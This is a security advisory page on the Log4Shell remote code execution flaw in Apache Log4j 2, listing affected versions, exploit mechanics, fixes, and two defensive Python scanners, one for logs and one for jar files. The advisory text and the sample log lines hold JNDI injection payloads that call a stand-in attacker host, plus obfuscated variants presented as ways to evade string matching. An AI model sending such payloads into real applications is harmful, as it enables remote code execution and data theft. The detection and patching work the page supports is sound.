CVE-2021-44228
Remote Code Execution vulnerability in org.apache.logging.log4j:log4j-core
What is CVE-2021-44228 About?
Apache Log4j 2 from 2.0-beta9 up to and including 2.14.1 evaluates JNDI lookups found in configuration, log messages, and log message parameters. An attacker who can control a logged message or parameter can inject a `${jndi:...}` lookup and have the application load and execute arbitrary code from an LDAP server the attacker runs. 2.15.0 disabled message lookups by default but its fix was incomplete (tracked as CVE-2021-45046); 2.16.0 removes message lookups entirely. Exploitation is easy wherever attacker-controlled input reaches a log statement.
Affected Software
- org.apache.logging.log4j:log4j-core
  - >=2.0-beta9, <2.3.1
  - >=2.4, <2.12.2
  - >=2.13.0, <2.15.0
- com.guicedee.services:log4j-core
  - <=1.2.1.2-jre17
- org.ops4j.pax.logging:pax-logging-log4j2
  - >=1.8.0, <1.9.2
  - >=1.10.0, <1.10.8
  - >=1.11.0, <1.11.10
  - >=2.0.0, <2.0.11
Technical Details
This critical vulnerability, commonly known as Log4Shell, affects Apache Log4j 2 from 2.0-beta9 up to and including 2.14.1 (2.15.0 shipped only a partial fix). It stems from message lookup substitution: when a logged message or parameter contains a `${...}` expression, Log4j's substitutor evaluates it, and the `jndi` lookup hands the remainder to JNDI (Java Naming and Directory Interface). An attacker who can control log messages or log message parameters can therefore inject a JNDI lookup string such as `${jndi:ldap://attacker.com/a}`; while resolving it, Log4j makes an LDAP (or RMI, DNS, etc.) request to a server the attacker controls. The response can either point at a remote class (via the `javaCodeBase` and `javaFactory` attributes), which older JVMs fetch over HTTP and instantiate, or carry a serialized Java object that the application deserializes; both paths run attacker code inside the vulnerable process. Substitution is recursive, so the marker can be hidden with nested lookups such as `${${lower:j}ndi:ldap://...}` or `${${::-j}ndi:...}`, which defeat naive `${jndi:` string matching. Version 2.15.0 attempted a fix (message lookups off by default, JNDI restricted to localhost) but it was incomplete, leading to CVE-2021-45046; 2.16.0 disables JNDI by default and removes message lookup support altogether.
What is the Impact of CVE-2021-44228?
Successful exploitation allows an attacker to execute arbitrary code on the target with the privileges of the JVM process running the affected application, leading to complete system compromise, data theft, and denial of service.
What is the Exploitability of CVE-2021-44228?
Exploitation is low complexity. The only prerequisite is getting an attacker-controlled string into something the application logs, as the message or as a message parameter; this is routinely possible without authentication through HTTP headers such as User-Agent and X-Forwarded-For, form fields, usernames, and any other input that ends up in a log statement. The vulnerability is remotely exploitable, needs no local access, and needs no privileges on the target for the injection step. The lookup also need not fire in the service that first receives the input: a string stored in a database or forwarded to a backend is triggered wherever a vulnerable Log4j instance eventually logs it. Whether the JNDI callback ends in code execution depends on the JVM and classpath: recent JDKs refuse to load remote classes from an LDAP codebase by default (com.sun.jndi.ldap.object.trustURLCodebase=false), but deserialization gadgets and local factory classes on the classpath still allow exploitation, and the outbound LDAP or DNS request alone confirms the vulnerability and can leak data such as environment variables. Risk is exceptionally high given Log4j's ubiquity, the ease of injection, and the impact of remote code execution. Exploit maturity is rated 'High confidence exploit', meaning effective, publicly available exploit tooling exists.
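The lookup substitution described under Technical Details and the injection channels above, as an added detection example (written for this page, not code from the page's sources or from Log4j itself): a Python emulation of the subset of Log4j 2 lookup semantics attackers use to obfuscate the marker (nested lookups, the `lower`/`upper` lookups and the `:-` default-value separator), followed by a scan over constructed access-log lines that reports the canonical `${jndi:...}` lookup even where a plain `${jndi:` substring match would miss it. The log lines and the attacker.com hostname are constructed sample data; `env` and other lookups are treated as unset so that only their defaults apply.

```python
import re
from typing import List, Tuple

# Constructed web-server access log lines (sample data for this example, not real traffic).
# Lines 2-5 carry a JNDI lookup in the User-Agent field, lines 3-5 in obfuscated form.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET /login HTTP/1.1" 200 88 "-" "${jndi:ldap://attacker.com/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET /login HTTP/1.1" 200 88 "-" "${${lower:j}ndi:${lower:l}dap://attacker.com/b}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET /api HTTP/1.1" 200 88 "-" "${${env:NOPE:-j}ndi:rmi://attacker.com/c}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:05 +0000] "GET /x HTTP/1.1" 200 88 "-" "${${::-j}${::-n}${::-d}${::-i}:ldap://attacker.com/d}"',
    '10.0.0.7 - - [10/Dec/2021:12:00:06 +0000] "GET /price?v=${date:yyyy} HTTP/1.1" 200 88 "-" "curl/7.79"',
]


def find_matching_brace(text: str, start: int) -> int:
    """Index of the '}' closing the '${' whose body begins at `start`, or -1 if unbalanced."""
    depth = 1
    i = start
    while i < len(text):
        if text.startswith("${", i):
            depth += 1
            i += 2
            continue
        if text[i] == "}":
            depth -= 1
            if depth == 0:
                return i
        i += 1
    return -1


def resolve_lookup(body: str) -> str:
    """Resolve one lookup body whose inner lookups have already been substituted.

    Emulates the subset of Log4j 2 lookup semantics that matter for de-obfuscation:
    the ':-' default-value separator, the 'lower' and 'upper' lookups, and the rule that
    an unresolvable lookup without a default is left in place verbatim. 'jndi' is never
    resolved here; it is rewritten in canonical form so the scanner can match it.
    """
    var, default = body.split(":-", 1) if ":-" in body else (body, None)
    name, key = var.split(":", 1) if ":" in var else ("", var)
    name = name.lower()                     # Log4j lowercases the lookup prefix
    if name == "lower":
        return key.lower()
    if name == "upper":
        return key.upper()
    if name == "jndi":
        return "${jndi:" + key + "}"        # the dangerous lookup, canonicalised
    if default is not None:                 # env/sys/... are treated as unset here
        return default
    return "${" + body + "}"                # unresolved: Log4j keeps the literal text


def substitute(text: str, depth: int = 0) -> str:
    """Emulate Log4j 2's recursive ${...} substitution (innermost lookups first)."""
    if depth > 32:                          # stop runaway recursion instead of looping
        return text
    out: List[str] = []
    i = 0
    while i < len(text):
        if text.startswith("${", i):
            end = find_matching_brace(text, i + 2)
            if end == -1:                   # unbalanced: leave the rest untouched
                out.append(text[i:])
                break
            inner = substitute(text[i + 2:end], depth + 1)
            out.append(resolve_lookup(inner))
            i = end + 1
        else:
            out.append(text[i])
            i += 1
    return "".join(out)


JNDI_RE = re.compile(r"\$\{jndi:[^}]*\}", re.IGNORECASE)


def find_jndi_lookups(line: str) -> List[str]:
    """Canonical ${jndi:...} lookups present in a line after de-obfuscation."""
    return JNDI_RE.findall(substitute(line))


def scan_log(lines: List[str]) -> List[Tuple[int, str]]:
    """(line number, canonical lookup) for every JNDI lookup found in the log."""
    hits: List[Tuple[int, str]] = []
    for number, line in enumerate(lines, 1):
        for lookup in find_jndi_lookups(line):
            hits.append((number, lookup))
    return hits


if __name__ == "__main__":
    for number, lookup in scan_log(SAMPLE_LOG_LINES):
        print(f"line {number}: {lookup}")
```

Run it directly to print the four hits; in practice feed it the request logs of the edge service plus anything downstream that logs the same fields, and treat every hit as a confirmed attempt whether or not the callback succeeded. The emulator deliberately covers only the lookups used for obfuscation; it is a triage aid, not a reimplementation of Log4j's substitutor.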
What are the Known Public Exploits?
| PoC Author | Link | Commentary |
|---|---|---|
| fullhunt | Link | A fully automated, accurate, and extensive scanner for finding log4j RCE CVE-2021-44228 |
| kozmer | Link | A Proof-Of-Concept for the CVE-2021-44228 vulnerability. |
| christophetd | Link | Spring Boot web application vulnerable to Log4Shell (CVE-2021-44228). |
What are the Available Fixes for CVE-2021-44228?
Available Upgrade Options
- org.apache.logging.log4j:log4j-core
  - >=2.0-beta9, <2.3.1 → Upgrade to 2.3.1
  - >=2.4, <2.12.2 → Upgrade to 2.12.2
  - >=2.13.0, <2.15.0 → Upgrade to 2.15.0 (closes this CVE, but its fix is incomplete, see CVE-2021-45046; prefer 2.16.0 or later)
- org.ops4j.pax.logging:pax-logging-log4j2
  - >=1.8.0, <1.9.2 → Upgrade to 1.9.2
  - >=1.10.0, <1.10.8 → Upgrade to 1.10.8
  - >=1.11.0, <1.11.10 → Upgrade to 1.11.10
  - >=2.0.0, <2.0.11 → Upgrade to 2.0.11
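One way to check which of the ranges above a deployed artifact falls into, as an added example (written for this page, not tooling from Apache, OPS4J or Resolved Security): a Python scanner that opens a jar, war or ear, descends into nested jars, reads the version log4j-core records in its Maven pom.properties, and tests it against the affected log4j-core ranges listed above. It also checks whether `JndiLookup.class` is present, because the documented stop-gap for hosts that could not upgrade was to delete that class from the jar; a jar without it is reported as mitigated. The `make_jar` fixture builds a constructed archive with the same layout so the scanner runs offline. The entry paths are the standard Maven ones, and 2.15.0 is reported as fixed for this CVE only (it remains affected by CVE-2021-45046).

```python
import io
import re
import zipfile
from typing import Dict, List, Optional, Tuple

# Entry paths inside a Maven-built log4j-core jar.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"

# Affected log4j-core ranges from the advisory above, as [introduced, fixed).
AFFECTED_RANGES = [("2.0-beta9", "2.3.1"), ("2.4", "2.12.2"), ("2.13.0", "2.15.0")]

_VERSION_RE = re.compile(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-(beta|rc)(\d+))?")
_STAGE = {"beta": 0, "rc": 1}      # pre-releases sort before the final release (stage 2)


def version_key(v: str) -> Tuple[int, int, int, int, int]:
    """Sortable key for Log4j 2 version strings such as '2.0-beta9' or '2.12.2'."""
    m = _VERSION_RE.fullmatch(v)
    if not m:
        raise ValueError(f"unrecognised Log4j version {v!r}")
    stage = _STAGE[m[4]] if m[4] else 2
    return (int(m[1]), int(m[2]), int(m[3] or 0), stage, int(m[5] or 0))


def is_affected_version(v: str) -> bool:
    """True if `v` falls in one of the CVE-2021-44228 ranges for log4j-core."""
    k = version_key(v)
    return any(version_key(lo) <= k < version_key(hi) for lo, hi in AFFECTED_RANGES)


def classify(version: Optional[str], jndi_lookup_present: bool) -> str:
    """Status of one log4j-core jar with respect to this CVE."""
    if not jndi_lookup_present:
        return "mitigated"     # JndiLookup.class removed (or never shipped): lookup cannot run
    if version is None:
        return "unknown"       # class present but version unreadable: review manually
    return "vulnerable" if is_affected_version(version) else "fixed"


def assess(archive: bytes, path: str = "<memory>") -> List[Dict[str, object]]:
    """Report every log4j-core found in `archive`, descending into nested jar/war/ear entries."""
    findings: List[Dict[str, object]] = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(archive))
    except zipfile.BadZipFile:
        return findings
    with zf:
        names = set(zf.namelist())
        if POM_PROPERTIES in names or JNDI_LOOKUP_CLASS in names:
            version = None
            if POM_PROPERTIES in names:
                props = zf.read(POM_PROPERTIES).decode("utf-8", "replace")
                m = re.search(r"^version=(.+)$", props, re.MULTILINE)
                version = m[1].strip() if m else None
            present = JNDI_LOOKUP_CLASS in names
            findings.append({"path": path, "version": version,
                             "jndi_lookup_present": present,
                             "status": classify(version, present)})
        for name in sorted(names):
            if name.endswith((".jar", ".war", ".ear")):
                findings.extend(assess(zf.read(name), f"{path}!/{name}"))
    return findings


def make_jar(version: Optional[str], include_jndi_lookup: bool,
             nested: Optional[bytes] = None) -> bytes:
    """Constructed fixture: a zip laid out like log4j-core (not a real jar)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        if version is not None:
            zf.writestr(POM_PROPERTIES,
                        f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n")
        if include_jndi_lookup:
            zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")   # placeholder class bytes
        if nested is not None:
            zf.writestr("WEB-INF/lib/log4j-core.jar", nested)
    return buf.getvalue()


if __name__ == "__main__":
    war = make_jar(None, False, nested=make_jar("2.14.1", True))
    for finding in assess(war, "app.war"):
        print(finding)
```

Point `assess` at the bytes of a real deployment artifact to get one record per embedded log4j-core; anything reported as vulnerable or unknown should be upgraded to the versions listed above, and a mitigated jar still deserves the upgrade, since class deletion only removes the JNDI lookup and not the rest of the fixes.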
Additional Resources
- http://www.openwall.com/lists/oss-security/2021/12/13/2
- https://osv.dev/vulnerability/GHSA-jfh8-c2jp-5v3q
- https://logging.apache.org/log4j/2.x/manual/lookups.html#JndiLookup
- https://www.oracle.com/security-alerts/alert-cve-2021-44228.html
- https://packetstormsecurity.com/files/167794/Open-Xchange-App-Suite-7.10.x-Cross-Site-Scripting-Command-Injection.html
- http://www.openwall.com/lists/oss-security/2021/12/15/3
- https://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.md
- https://www.debian.org/security/2021/dsa-5020
- https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VU57UJDCFIASIO35GC55JMKSRXJMCDFM
What are Similar Vulnerabilities to CVE-2021-44228?
Similar Vulnerabilities: CVE-2021-45046, CVE-2021-45105, CVE-2022-23302, CVE-2022-23305, CVE-2022-23307
